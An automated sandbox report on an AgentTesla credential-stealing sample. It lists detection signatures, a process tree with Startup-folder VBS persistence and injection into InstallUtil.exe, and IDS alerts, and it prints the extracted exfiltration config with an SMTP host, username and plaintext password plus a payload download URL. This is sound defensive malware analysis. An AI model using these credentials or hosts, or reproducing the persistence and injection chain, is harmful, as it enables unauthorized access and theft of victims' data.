Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref#60031796.exe

Overview

General Information

Sample name:Ref#60031796.exe
Analysis ID:1567429
MD5:654ad72d10aed979428b6b130700754a
SHA1:68b0db31a9cab6fcc804dc6932d44d9081b14c14
SHA256:2f9639175e04906207564913e4c0493b196f59dd4bc8f62deea0ececb4346891
Tags:exeuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ref#60031796.exe (PID: 1012 cmdline: "C:\Users\user\Desktop\Ref#60031796.exe" MD5: 654AD72D10AED979428B6B130700754A)
    • InstallUtil.exe (PID: 5716 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 2404 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • vdvfyt.exe (PID: 5504 cmdline: "C:\Users\user\AppData\Roaming\vdvfyt.exe" MD5: 654AD72D10AED979428B6B130700754A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2367043467.0000000007080000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000003.00000002.3361572023.00000000028E4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Click to see the 14 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Ref#60031796.exe.7080000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.Ref#60031796.exe.3bce418.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.Ref#60031796.exe.3bce418.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.Ref#60031796.exe.3bce418.4.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x3167b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x316ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x31777:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x31809:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x31873:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x318e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x3197b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x31a0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.Ref#60031796.exe.3bce418.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 6 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , ProcessId: 2404, ProcessName: wscript.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 5716, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49759
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs" , ProcessId: 2404, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Ref#60031796.exe, ProcessId: 1012, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T15:20:35.207129+010020301711A Network Trojan was detected192.168.2.649759162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T15:22:44.360977+010028033053Unknown Traffic192.168.2.6499735.253.86.15443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 3.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeReversingLabs: Detection: 13%
                      Source: Ref#60031796.exeReversingLabs: Detection: 13%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeJoe Sandbox ML: detected
                      Source: Ref#60031796.exeJoe Sandbox ML: detected
                      Source: Ref#60031796.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.6:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49973 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49979 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49984 version: TLS 1.2
                      Source: Ref#60031796.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#60031796.exe, 00000000.00000002.2360003554.00000000063E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#60031796.exe, 00000000.00000002.2360003554.00000000063E0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 4x nop then jmp 0714BB07h0_2_0714B758
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 4x nop then jmp 0714BB07h0_2_0714B768
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 4x nop then jmp 071456B9h0_2_07145658
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 4x nop then jmp 071456B9h0_2_0714564A
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 4x nop then jmp 071452C1h0_2_07144EB8
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 4x nop then jmp 071452C1h0_2_07144EC8
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 4x nop then jmp 071456B9h0_2_07145853
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 4x nop then jmp 0714BB07h0_2_0714B85C

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:49759 -> 162.254.34.31:587
                      Source: global trafficTCP traffic: 192.168.2.6:49759 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET /Dwhm HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Dwhm HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Dwhm HTTP/1.1Host: oshi.at
                      Source: Joe Sandbox ViewIP Address: 194.15.112.248 194.15.112.248
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                      Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49973 -> 5.253.86.15:443
                      Source: global trafficTCP traffic: 192.168.2.6:49759 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /Dwhm HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Dwhm HTTP/1.1Host: oshi.atConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Dwhm HTTP/1.1Host: oshi.at
                      Source: global trafficDNS traffic detected: DNS query: oshi.at
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0?
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: http://ocsps.ssl.com0_
                      Source: vdvfyt.exe, 00000005.00000002.3361181229.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.0000000003276000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.0000000003218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.at
                      Source: vdvfyt.exe, 00000005.00000002.3361181229.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.0000000003276000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.0000000003218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.atd
                      Source: Ref#60031796.exe, 00000000.00000002.2347570758.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3361572023.0000000002861000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.00000000031AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3361572023.0000000002861000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: InstallUtil.exe, 00000003.00000002.3361572023.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: InstallUtil.exe, 00000003.00000002.3361572023.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Ref#60031796.exe, 00000000.00000002.2347570758.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.00000000031AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: https://oshi.at/Dwhm
                      Source: vdvfyt.exe, 00000005.00000002.3361181229.00000000031AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/Dwhml
                      Source: vdvfyt.exe, 00000005.00000002.3361181229.0000000003141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/Dwhmt
                      Source: vdvfyt.exe, 00000005.00000002.3361181229.0000000003218000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.00000000031AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.atD
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: Ref#60031796.exe, vdvfyt.exe.0.drString found in binary or memory: https://www.ssl.com/repository0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.6:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49973 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49979 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.6:49984 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, SKTzxzsJw.cs.Net Code: nUAqbab

                      System Summary

                      barindex
                      Source: 0.2.Ref#60031796.exe.3bce418.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0682DDE8 NtProtectVirtualMemory,0_2_0682DDE8
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0682DDE2 NtProtectVirtualMemory,0_2_0682DDE2
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0714F600 NtResumeThread,0_2_0714F600
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0714F5F8 NtResumeThread,0_2_0714F5F8
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_050F10B00_2_050F10B0
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_050F19380_2_050F1938
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_050F19480_2_050F1948
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06825FC80_2_06825FC8
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0682DB480_2_0682DB48
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0682A9B00_2_0682A9B0
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0682CE810_2_0682CE81
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0682CE900_2_0682CE90
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06825FB80_2_06825FB8
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0682DB380_2_0682DB38
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_068230880_2_06823088
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_068230980_2_06823098
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_068209960_2_06820996
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0682A9A00_2_0682A9A0
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F41DC00_2_06F41DC0
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F41DB00_2_06F41DB0
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F423480_2_06F42348
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F423380_2_06F42338
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F757D00_2_06F757D0
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F7842B0_2_06F7842B
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F76AB80_2_06F76AB8
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F7C8F80_2_06F7C8F8
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F757C00_2_06F757C0
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F707600_2_06F70760
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F71F580_2_06F71F58
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F71F480_2_06F71F48
